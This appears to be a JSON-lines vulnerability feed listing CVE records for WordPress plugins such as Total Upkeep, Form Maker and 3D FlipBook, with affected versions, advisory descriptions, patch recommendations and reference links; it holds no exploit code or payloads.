{"CVE_ID":"CVE-2025-2257","slug":"boldgrid-backup","versionImpact":"1.16.10","versionEndExcluding":"1.17.0","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.10 via the compression_level setting. This is due to the plugin using the compression_level setting in proc_open() without any validation. This makes it possible for authenticated attackers, with administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.17.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/boldgrid-backup\\\/pull\\\/622\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/boldgrid-backup\\\/pull\\\/622\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/boldgrid-backup\\\/tags\\\/1.16.7\\\/admin\\\/compressor\\\/class-boldgrid-backup-admin-compressor-system-zip.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/boldgrid-backup\\\/tags\\\/1.16.7\\\/admin\\\/compressor\\\/class-boldgrid-backup-admin-compressor-system-zip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257988%40boldgrid-backup&new=3257988%40boldgrid-backup&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257988%40boldgrid-backup&new=3257988%40boldgrid-backup&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec3cc3e-c11b-43b6-9dd0-caa5ccfb90c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec3cc3e-c11b-43b6-9dd0-caa5ccfb90c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13907","slug":"boldgrid-backup","versionImpact":"1.16.8","versionEndExcluding":"1.16.9","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.16.8 via the 'download' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.16.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/trunk\\\/includes\\\/class-boldgrid-backup-archive-fetcher.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/trunk\\\/includes\\\/class-boldgrid-backup-archive-fetcher.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246655\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246655\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21da92d2-c38d-4a12-b850-bd0b580aaa54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21da92d2-c38d-4a12-b850-bd0b580aaa54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9461","slug":"boldgrid-backup","versionImpact":"1.16.6","versionEndExcluding":"1.16.7","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.6 via the cron_interval parameter. This is due to missing input validation and sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/tags\\\/1.16.5\\\/admin\\\/class-boldgrid-backup-admin-settings.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/tags\\\/1.16.5\\\/admin\\\/class-boldgrid-backup-admin-settings.php#L748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3111","slug":"h5p","versionImpact":"1.15.7","versionEndExcluding":"1.15.8","description":"The Interactive Content  WordPress plugin before 1.15.8 does not validate uploads which could allow a Contributors and above to update malicious SVG files, leading to Stored Cross-Site Scripting issues","recommendation":"Update to version 1.15.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c39f3b5-d407-4eb0-aa34-b498fe196c55\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c39f3b5-d407-4eb0-aa34-b498fe196c55\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9887","slug":"miniorange-wp-as-saml-idp","versionImpact":"1.15.6","versionEndExcluding":"1.15.7","description":"The Login using WordPress Users ( WP as SAML IDP ) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.15.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/220b0e71-8e80-4a29-982e-259a475835fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/220b0e71-8e80-4a29-982e-259a475835fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/miniorange-wp-as-saml-idp.md\",\"name\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/miniorange-wp-as-saml-idp.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-wp-as-saml-idp\\\/trunk\\\/controllers\\\/sso-idp-settings.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-wp-as-saml-idp\\\/trunk\\\/controllers\\\/sso-idp-settings.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3184249%40miniorange-wp-as-saml-idp%2Ftrunk&old=3158222%40miniorange-wp-as-saml-idp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3184249%40miniorange-wp-as-saml-idp%2Ftrunk&old=3158222%40miniorange-wp-as-saml-idp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3883","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.4","versionEndExcluding":"1.15.5","description":"The 3D FlipBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Bookmark URL field in all versions up to, and including, 1.15.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/016462cf-abe9-4c90-abd2-b5bb69348d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/016462cf-abe9-4c90-abd2-b5bb69348d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079536\\\/interactive-3d-flipbook-powered-physics-engine\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079536\\\/interactive-3d-flipbook-powered-physics-engine\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3671","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.15.4","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.4 does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b765f39-38e0-49c7-843a-a5b9375a32e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b765f39-38e0-49c7-843a-a5b9375a32e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3954","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.15.4","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b463ccbb-2dc1-479f-bc88-becd204b2dc0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b463ccbb-2dc1-479f-bc88-becd204b2dc0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13605","slug":"form-maker","versionImpact":"1.15.32","versionEndExcluding":"1.15.33","description":"The Form Maker by 10Web  WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5543b3b-1c28-481b-aba4-9a07d160e1f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5543b3b-1c28-481b-aba4-9a07d160e1f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13053","slug":"form-maker","versionImpact":"1.15.32","versionEndExcluding":"1.15.33","description":"The Form Maker by 10Web  WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c667a70-8b38-4854-8969-2971f9c2fe79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c667a70-8b38-4854-8969-2971f9c2fe79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10680","slug":"form-maker","versionImpact":"1.15.31","versionEndExcluding":"1.15.32","description":"The Form Maker by 10Web  WordPress plugin before 1.15.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/240948d7-ece0-437f-b926-62937bdbd9db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/240948d7-ece0-437f-b926-62937bdbd9db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10562","slug":"form-maker","versionImpact":"1.15.30","versionEndExcluding":"1.15.31","description":"The Form Maker by 10Web  WordPress plugin before 1.15.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10558","slug":"form-maker","versionImpact":"1.15.29","versionEndExcluding":"1.15.30","description":"The Form Maker by 10Web  WordPress plugin before 1.15.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7028db78-2870-48d5-b06b-480ac8be3655\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7028db78-2870-48d5-b06b-480ac8be3655\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10560","slug":"form-maker","versionImpact":"1.15.29","versionEndExcluding":"1.15.30","description":"The Form Maker by 10Web  WordPress plugin before 1.15.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80298c89-544d-4894-a837-253f5f26cf42\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80298c89-544d-4894-a837-253f5f26cf42\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6776","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.2","versionEndExcluding":"1.15.3","description":"The 3D FlipBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Ready Function\u2019 field in all versions up to, and including, 1.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/500fd8aa-9ad1-41ee-bbeb-cda9c80c4fcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/500fd8aa-9ad1-41ee-bbeb-cda9c80c4fcb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3014013\\\/interactive-3d-flipbook-powered-physics-engine\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3014013\\\/interactive-3d-flipbook-powered-physics-engine\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6130","slug":"form-maker","versionImpact":"1.15.25","versionEndExcluding":"1.15.26","description":"The Form Maker by 10Web  WordPress plugin before 1.15.26 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.15.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbed2968-4bd6-49ae-bd61-8a1f751e7041\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbed2968-4bd6-49ae-bd61-8a1f751e7041\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0667","slug":"form-maker","versionImpact":"1.15.21","versionEndExcluding":"1.15.22","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.15.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/tags\\\/1.15.21\\\/booster\\\/controller.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/tags\\\/1.15.21\\\/booster\\\/controller.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4666","slug":"form-maker","versionEndExcluding":"1.15.20","description":"The Form Maker by 10Web WordPress plugin before 1.15.20 does not validate signatures when creating them on the server from user input, allowing unauthenticated users to create arbitrary files and lead to RCE","recommendation":"Update to version 1.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6597e36-02d6-46b4-89db-52c160f418be\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6597e36-02d6-46b4-89db-52c160f418be\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9694","slug":"cmsmasters-elementor-addon","versionImpact":"1.14.7","versionEndExcluding":"1.15.0","description":"The CMSMasters Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.14.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.cmsmasters.net\\\/cmsmasters-elementor-addon-changelog\\\/\",\"name\":\"https:\\\/\\\/docs.cmsmasters.net\\\/cmsmasters-elementor-addon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb78b64-ebe3-44e9-9061-d380693c5566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb78b64-ebe3-44e9-9061-d380693c5566?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36656","slug":"ultimate-addons-for-gutenberg","versionEndExcluding":"1.15.0","description":"The Spectra WordPress plugin before 1.15.0 does not sanitize user input as it reaches its style HTML attribute, allowing contributors to conduct stored XSS attacks via the plugin's Gutenberg blocks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10f7e892-7a91-4292-b03e-6ad75756488b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10f7e892-7a91-4292-b03e-6ad75756488b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36702","slug":"ultimate-addons-for-gutenberg","versionImpact":"1.14.7","versionEndExcluding":"1.14.8","description":"The Ultimate Addons for Gutenberg plugin for WordPress is vulnerable to Authenticated Settings Change in versions up to, and including, 1.14.7. This is due to missing capability checks on several AJAX actions. This makes it possible for authenticated attackers with subscriber+ roles to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4419a302-4305-44f8-a256-dd276b5cd751?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4419a302-4305-44f8-a256-dd276b5cd751?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-addons-for-gutenberg-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-addons-for-gutenberg-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8252","slug":"clean-login","versionImpact":"1.14.5","versionEndExcluding":"1.14.6","description":"The Clean Login plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.14.5 via the 'template' attribute of the clean-login-register shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.14.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/shortcodes.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/shortcodes.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/frontend.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/frontend.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143241%40clean-login&new=3143241%40clean-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143241%40clean-login&new=3143241%40clean-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2843","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.14.15","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.15 does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e713eaf-f332-47e2-a131-c14222201fdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e713eaf-f332-47e2-a131-c14222201fdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4932","slug":"boldgrid-backup","versionEndExcluding":"1.14.14","description":"The Total Upkeep plugin for WordPress is vulnerable to information disclosure in versions up to, and including 1.14.13. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2684462%40boldgrid-backup&new=2684462%40boldgrid-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2684462%40boldgrid-backup&new=2684462%40boldgrid-backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e346146-1c00-4e03-a6c7-372566d7ffc9\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e346146-1c00-4e03-a6c7-372566d7ffc9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3365","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.14.14","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.14 does not have authorisation when deleting shipment, allowing any authenticated users, such as subscriber to delete arbitrary shipment","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21ce5baa-8085-4053-8d8b-f7d3e2ae70c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21ce5baa-8085-4053-8d8b-f7d3e2ae70c1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36848","slug":"boldgrid-backup","versionImpact":"1.14.9","versionEndExcluding":"1.14.10","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.14.9 via the env-info.php and restore-info.json files. This makes it possible for unauthenticated attackers to find the location of back-up files and subsequently download them.","recommendation":"Update to version 1.14.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d35c19d9-8586-4c5b-9a01-44739cbeee19\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d35c19d9-8586-4c5b-9a01-44739cbeee19\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86a5adaf-02b7-4b42-a048-8bc01f07656b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86a5adaf-02b7-4b42-a048-8bc01f07656b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13215","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.10","versionEndExcluding":"1.14","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.10 via the 'render' function in modules\/modal-popup\/widgets\/modal-popup.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1058\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1058\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221982\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221982\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4feacb75-0533-4f53-8ce9-3e45ee8336e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4feacb75-0533-4f53-8ce9-3e45ee8336e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
